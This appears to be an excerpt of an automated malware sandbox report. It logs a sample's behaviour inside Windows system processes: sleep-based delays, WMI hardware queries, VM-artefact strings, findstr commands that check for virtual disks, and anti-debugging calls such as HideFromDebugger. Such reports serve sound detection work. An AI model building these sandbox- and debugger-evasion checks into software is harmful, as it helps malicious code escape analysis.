Source: C:\Windows\System32\lsass.exe TID: 6436Thread sleep count: 303 > 30
Source: C:\Windows\System32\lsass.exe TID: 6436Thread sleep time: -30300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6584Thread sleep count: 409 > 30
Source: C:\Windows\System32\svchost.exe TID: 6584Thread sleep time: -40900s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 7308Thread sleep count: 185 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6668Thread sleep count: 1650 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6668Thread sleep count: 626 > 30
Source: C:\Windows\System32\svchost.exe TID: 7348Thread sleep count: 385 > 30
Source: C:\Windows\System32\svchost.exe TID: 7348Thread sleep time: -38500s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7304Thread sleep count: 378 > 30
Source: C:\Windows\System32\svchost.exe TID: 7304Thread sleep time: -37800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5000Thread sleep count: 372 > 30
Source: C:\Windows\System32\svchost.exe TID: 5000Thread sleep time: -37200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2844Thread sleep count: 366 > 30
Source: C:\Windows\System32\svchost.exe TID: 2844Thread sleep time: -36600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5160Thread sleep count: 302 > 30
Source: C:\Windows\System32\svchost.exe TID: 5160Thread sleep time: -30200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2448Thread sleep count: 347 > 30
Source: C:\Windows\System32\svchost.exe TID: 2448Thread sleep time: -34700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3176Thread sleep count: 300 > 30
Source: C:\Windows\System32\svchost.exe TID: 3176Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1464Thread sleep count: 326 > 30
Source: C:\Windows\System32\svchost.exe TID: 1464Thread sleep time: -32600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2112Thread sleep count: 334 > 30
Source: C:\Windows\System32\svchost.exe TID: 2112Thread sleep time: -33400s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2248Thread sleep count: 319 > 30
Source: C:\Windows\System32\svchost.exe TID: 2248Thread sleep time: -31900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5440Thread sleep count: 308 > 30
Source: C:\Windows\System32\svchost.exe TID: 5440Thread sleep time: -30800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5292Thread sleep count: 308 > 30
Source: C:\Windows\System32\svchost.exe TID: 5292Thread sleep time: -30800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1404Thread sleep count: 303 > 30
Source: C:\Windows\System32\svchost.exe TID: 1404Thread sleep time: -30300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7844Thread sleep count: 299 > 30
Source: C:\Windows\System32\svchost.exe TID: 7816Thread sleep count: 297 > 30
Source: C:\Windows\System32\svchost.exe TID: 7852Thread sleep count: 294 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
Source: C:\Windows\System32\wbem\WMIADAP.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\cmd.exeCode function: 18_2_0000022123C2D894 FindFirstFileExW,18_2_0000022123C2D894
Source: C:\Windows\System32\cmd.exeCode function: 18_2_0000022123C2DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,18_2_0000022123C2DA18
Source: C:\Windows\System32\cmd.exeCode function: 18_2_0000022123C5D894 FindFirstFileExW,18_2_0000022123C5D894
Source: C:\Windows\System32\cmd.exeCode function: 18_2_0000022123C5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,18_2_0000022123C5DA18
Source: C:\Windows\System32\conhost.exeCode function: 19_2_0000013F08E6DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,19_2_0000013F08E6DA18
Source: C:\Windows\System32\conhost.exeCode function: 19_2_0000013F08E6D894 FindFirstFileExW,19_2_0000013F08E6D894
Source: C:\Windows\System32\conhost.exeCode function: 19_2_0000013F08E9DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,19_2_0000013F08E9DA18
Source: C:\Windows\System32\conhost.exeCode function: 19_2_0000013F08E9D894 FindFirstFileExW,19_2_0000013F08E9D894
Source: C:\Windows\System32\conhost.exeCode function: 36_2_000001FD186DD894 FindFirstFileExW,36_2_000001FD186DD894
Source: C:\Windows\System32\conhost.exeCode function: 36_2_000001FD186DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,36_2_000001FD186DDA18
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000017C6DABDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,37_2_0000017C6DABDA18
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000017C6DABD894 FindFirstFileExW,37_2_0000017C6DABD894
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000017C6DD7DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,37_2_0000017C6DD7DA18
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000017C6DD7D894 FindFirstFileExW,37_2_0000017C6DD7D894
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_00000225DC64DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,38_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_00000225DC64D894 FindFirstFileExW,38_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_00000225DC67DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,38_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_00000225DC67D894 FindFirstFileExW,38_2_00000225DC67D894
Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000202C0AEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,39_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000202C0AED894 FindFirstFileExW,39_2_00000202C0AED894
Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000202C0B1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,39_2_00000202C0B1DA18
Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000202C0B1D894 FindFirstFileExW,39_2_00000202C0B1D894
Source: C:\Windows\System32\svchost.exeCode function: 40_2_000002A66130DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,40_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exeCode function: 40_2_000002A66130D894 FindFirstFileExW,40_2_000002A66130D894
Source: C:\Windows\System32\dwm.exeCode function: 41_2_000002BAAEDCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,41_2_000002BAAEDCDA18
Source: C:\Windows\System32\dwm.exeCode function: 41_2_000002BAAEDCD894 FindFirstFileExW,41_2_000002BAAEDCD894
Source: C:\Windows\System32\dwm.exeCode function: 41_2_000002BAAEDFDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,41_2_000002BAAEDFDA18
Source: C:\Windows\System32\dwm.exeCode function: 41_2_000002BAAEDFD894 FindFirstFileExW,41_2_000002BAAEDFD894
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 42_2_000002705306DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,42_2_000002705306DA18
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 42_2_000002705306D894 FindFirstFileExW,42_2_000002705306D894
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: Amcache.hve.10.drBinary or memory string: VMware
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A01D7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxservice
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A01D7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmusrvc2b
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A01D7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxsf.sys
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.drBinary or memory string: VMware SATA CD00
Source: Amcache.hve.10.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: svchost.exe, 0000002F.00000002.3076142932.000001845BC0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.drBinary or memory string: NECVMWarVMware SATA CD00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.drBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: Amcache.hve.10.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.49.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.49.drBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 00000028.00000002.2993257907.000002A66062A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: System.evtx.49.drBinary or memory string: VMCI: Using capabilities (0x1c).
Source: Amcache.hve.10.drBinary or memory string: vmci.sys
Source: powershell.exe, 00000007.00000002.2143782680.000001A69FE59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: qemu-ga
Source: cmd.exe, 00000012.00000003.2144168789.0000022123586000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A000B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicshutdown
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.drBinary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 00000031.00000000.2542454624.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3023041096.000001D55862B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.49.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $Hyper-V Time Synchronization Service
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $Hyper-V Volume Shadow Copy Requestor
Source: Amcache.hve.10.drBinary or memory string: VMware20,1
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicvss
Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.10.drBinary or memory string: VMware PCI VMCI Bus Device
Source: svchost.exe, 00000031.00000000.2544794675.000001D5592C3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dowvmci
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.49.drBinary or memory string: VMware
Source: Amcache.hve.10.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.10.drBinary or memory string: VMware Virtual RAM
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.49.drBinary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A01D7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxguest.sys
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmmouse.sys
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: -Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
Source: powershell.exe, 00000007.00000002.2143782680.000001A69FE59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: qemuwmi2b
Source: Amcache.hve.10.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: cmd.exe, 00000012.00000003.2151836316.0000022123586000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
Source: lsass.exe, 00000027.00000002.3021017119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
Source: powershell.exe, 00000007.00000002.2143782680.000001A69FE3A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: QEMU HARDDISK
Source: Amcache.hve.10.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A01D7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxmouse.sys
Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: C:\Program Files\VMware
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.49.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VBoxMouse.sys
Source: dwm.exe, 00000029.00000002.3092877606.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
Source: Microsoft-Windows-Partition%4Diagnostic.evtx.49.drBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.drBinary or memory string: storahciNECVMWarVMware SATA CD00
Source: Amcache.hve.10.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: lsass.exe, 00000027.00000002.3013591403.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475100061.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000000.2481960070.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2991631959.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.2995071226.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000000.2506773435.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.2994903908.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.2510442351.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.2523222262.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.3015839207.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2542454624.000001D55862B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
Source: lsass.exe, 00000027.00000002.3021017119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
Source: Amcache.hve.10.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.10.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: lsass.exe, 00000027.00000000.2476179547.00000202C0379000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.drBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000031.00000002.3024245117.000001D558643000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmcitpA
Source: svchost.exe, 00000028.00000002.3000439300.000002A660662000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000038.00000000.2589284251.0000023FD3802000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A01D7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: c:\program files\vmware
Source: lsass.exe, 00000027.00000002.3021017119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VBoxSF.sys
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VBoxGuest.sys
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: !Hyper-V PowerShell Direct Service
Source: dwm.exe, 00000029.00000002.3092877606.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugFlagsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugFlags
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugObjectHandle
Source: C:\Windows\System32\cmd.exeCode function: 18_2_0000022123C2CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_0000022123C2CD80
Source: C:\Windows\System32\cmd.exeCode function: 18_2_0000022123C21E3C LoadLibraryA,GetProcAddress,Sleep,18_2_0000022123C21E3C
Source: C:\Windows\System32\cmd.exeCode function: 18_2_0000022123C235C8 GetProcessHeap,HeapAlloc,StrCmpNIW,GetProcessHeap,HeapFree,18_2_0000022123C235C8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
Source: C:\Windows\System32\cmd.exeCode function: 18_2_0000022123C2CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_0000022123C2CD80
Source: C:\Windows\System32\cmd.exeCode function: 18_2_0000022123C284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_0000022123C284B0
Source: C:\Windows\System32\cmd.exeCode function: 18_2_0000022123C28814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_0000022123C28814
